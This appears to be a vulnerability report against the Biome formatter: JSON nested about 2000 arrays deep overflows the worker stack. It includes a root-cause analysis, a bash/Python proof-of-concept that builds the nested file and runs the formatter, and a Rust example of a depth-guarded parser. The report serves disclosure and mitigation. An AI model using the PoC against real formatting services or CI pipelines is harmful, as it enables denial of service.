Environment information
What happened?
Summary
This is a confirmed variant of CVE-2026-29062 in jackson-core, where excessive JSON nesting can cause denial of service. The target is biomejs/biome (@biomejs/biome@2.4.16), implemented in Rust rather than the original Java.
An external JSON file with 1000 nested arrays formats successfully. At about 2000 nested arrays, the public biome format --write input.json CLI reaches a workspace worker stack overflow and logs a fatal Rust runtime stack overflow.
RCA
The JSON formatting path recursively descends nested arrays without enforcing a safe maximum nesting depth before worker stack exhaustion. The input is a valid JSON file consumed through the documented formatter CLI.
The external JSON file reaches the documented formatter path:
The formatter parses the file and then formats the JSON syntax tree:
let parsed = biome_json_parser::parse_json(source, JsonParserOptions::default());
let printed = biome_json_formatter::format_node(parsed.syntax());
Array formatting descends into child elements:
for element in array.elements() {
    element.format().fmt(f)?;
}
Each child array re-enters the same formatting path without a depth guard, so the formatter worker stack can be exhausted by a deeply nested valid JSON document.
PoC
#!/usr/bin/env bash
set -eu
tmp="$(mktemp -d)"
trap 'rm -rf "$tmp"' EXIT
cd "$tmp"
npm init -y >/dev/null 2>&1
npm install --silent @biomejs/biome@2.4.16
python3 - <<'PY'
from pathlib import Path
for name, depth in [("safe.json", 1000), ("attack.json", 2000)]:
    # Build a document of `depth` nested arrays around a single scalar
    Path(name).write_text("[" * depth + "0" + "]" * depth)
    print(f"{name}_depth={depth}")
PY
npx biome format --write safe.json
set +e
attack_output="$(npx biome format --write attack.json 2>&1)"
status=$?
set -e
printf '%s\n' "$attack_output"
echo "attack_status=$status"
printf '%s\n' "$attack_output" | grep -E "overflowed its stack|fatal runtime error: stack overflow"
Impact
Services or CI systems that run Biome formatting on untrusted JSON can have a workspace worker abort from stack overflow. This can be used to deny service in web formatters, repository scanning systems, automated code-quality checks, editor backends, or import pipelines that process user-supplied JSON files.
Expected Result
Biome should reject JSON documents that exceed a safe nesting-depth limit with a
bounded formatter/parser diagnostic. Processing an excessively nested but valid
JSON file should not overflow the workspace worker stack, abort the Rust runtime,
or terminate the formatting service.
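As an added illustration of the mitigation described in the RCA and this expected result (example code, not Biome's own parser or formatter, and not the project's actual limit), the walker below descends nested JSON arrays recursively but checks a nesting-depth limit before each descent. The limit of 1024 is an assumed value chosen so that the report's 1000-deep document is accepted and the 2000-deep one is rejected with a bounded diagnostic instead of exhausting the stack; the `nested_arrays` helper reproduces the shape of the PoC's generated files.

```rust
// Added example: a depth-guarded recursive array walker. Not Biome code.
// Only the subset of JSON needed here is handled: arrays, numbers, whitespace, commas.

#[derive(Debug, PartialEq)]
pub enum NestingError {
    /// Nesting exceeded the configured limit; reported as a diagnostic, not a crash.
    TooDeep { limit: usize },
    /// Unexpected byte at the given offset.
    Unexpected(usize),
    /// Input ended inside an open array.
    UnexpectedEnd,
}

/// Assumed illustrative limit; the real value would be a tuning decision.
pub const MAX_NESTING_DEPTH: usize = 1024;

/// Builds the same document shape as the PoC: `depth` nested arrays around `0`.
pub fn nested_arrays(depth: usize) -> String {
    format!("{}0{}", "[".repeat(depth), "]".repeat(depth))
}

/// Walks `input` and returns its maximum array nesting depth, or an error.
/// Recursion never goes more than `limit + 1` frames deep because the guard
/// runs before each descent.
pub fn check_nesting(input: &str, limit: usize) -> Result<usize, NestingError> {
    let bytes = input.as_bytes();
    let mut pos = 0;
    let max = parse_value(bytes, &mut pos, 0, limit)?;
    skip_ws(bytes, &mut pos);
    if pos != bytes.len() {
        return Err(NestingError::Unexpected(pos));
    }
    Ok(max)
}

fn skip_ws(bytes: &[u8], pos: &mut usize) {
    while *pos < bytes.len() && bytes[*pos].is_ascii_whitespace() {
        *pos += 1;
    }
}

fn parse_value(bytes: &[u8], pos: &mut usize, depth: usize, limit: usize) -> Result<usize, NestingError> {
    skip_ws(bytes, pos);
    match bytes.get(*pos) {
        None => Err(NestingError::UnexpectedEnd),
        Some(b'[') => {
            // Depth guard: refuse to descend past the limit before recursing.
            let depth = depth + 1;
            if depth > limit {
                return Err(NestingError::TooDeep { limit });
            }
            *pos += 1;
            let mut deepest = depth;
            skip_ws(bytes, pos);
            if bytes.get(*pos) == Some(&b']') {
                *pos += 1;
                return Ok(deepest);
            }
            loop {
                deepest = deepest.max(parse_value(bytes, pos, depth, limit)?);
                skip_ws(bytes, pos);
                match bytes.get(*pos) {
                    Some(b',') => *pos += 1,
                    Some(b']') => {
                        *pos += 1;
                        return Ok(deepest);
                    }
                    Some(_) => return Err(NestingError::Unexpected(*pos)),
                    None => return Err(NestingError::UnexpectedEnd),
                }
            }
        }
        Some(b) if b.is_ascii_digit() || *b == b'-' => {
            // Scalar: consume a simple numeric token.
            while *pos < bytes.len() && (bytes[*pos].is_ascii_digit() || matches!(bytes[*pos], b'-' | b'.')) {
                *pos += 1;
            }
            Ok(depth)
        }
        Some(_) => Err(NestingError::Unexpected(*pos)),
    }
}

fn main() {
    for depth in [1000usize, 2000] {
        match check_nesting(&nested_arrays(depth), MAX_NESTING_DEPTH) {
            Ok(d) => println!("depth={depth}: accepted (max nesting {d})"),
            Err(e) => println!("depth={depth}: rejected with bounded diagnostic {e:?}"),
        }
    }
}
```

The important design point is where the check sits: it runs on entry to each array, before the recursive call, so the error surfaces after at most `limit + 1` frames regardless of how much deeper the document goes. A check that only counts depth after the fact would still let a hostile document consume the whole worker stack first.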
Code of Conduct